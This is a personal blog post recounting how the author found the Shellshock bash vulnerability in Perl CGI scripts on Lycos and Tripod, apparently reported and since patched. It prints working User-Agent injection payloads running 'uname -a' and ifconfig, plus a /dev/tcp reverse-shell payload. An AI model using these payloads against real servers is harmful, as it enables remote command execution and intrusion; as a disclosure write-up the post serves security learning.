My ShellShockings

While I was suffering the interwebs my eyes caught a perl script which prints out the environment variables. For example something like this.
[code language=”perl”]
use CGI;

$cgi = new CGI;

for $key ( $cgi->param() ) {
$input{$key} = $cgi->param($key);

print qq{Content-type: text/html


foreach $key (sort (keys %ENV)) {
print $key, ‘ = ‘, $ENV{$key}, "<br>\n";

for $key ( keys %input ) {
print $key, ‘ = ‘, $input{$key}, "<br>\n";

print qq{<form METHOD=POST><input type="submit" value="Post Request">
<input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get Request ">
<input name="getfield" ></form>};

print qq{</body></html>};
This would output the following.
[code language=”text”]
CONTEXT_DOCUMENT_ROOT : /var/chroot/home/
DOCUMENT_ROOT : /var/chroot/home/
GD_PHP_HANDLER : x-httpd-php5-3
HTTP_ACCEPT : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_ENCODING : gzip, deflate, sdch
HTTP_CONNECTION : keep-alive
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
PATH : /usr/local/bin:/usr/bin:/bin
It takes the “User-Agent:” field from the client. We can modify this to whatever input we like. So yeah it was vulnerable to the bash shellshock vulnerability. For example let’s inject “uname –a” and see the output.
[code language=”c”]
GET xxxx HTTP/1.1
User-Agent: () { :;}; echo; /bin/bash –c “uname –a”
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

View post on

Let’s try () { :;}; echo; /bin/bash –c “/sbin/ifconfig”

View post on

Since we are arbitrarily injecting code into the bash shell we can get a reverse connection like this.
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/ 0>&1

View post on

That is it Game Over 🙂 This is how I owned lycos and tripod. As soon as I found this I reported them and they have already fixed this.
By the way was too affected by the Shellshock vulnerability.

View post on

View post on

After reporting them it was too successfully patched ?
Bonus: Tripod had a reflected XSS vulnerability too.

View post on

I don’t know why it gives such a search result 😉

One thought on “My ShellShockings

Leave a Reply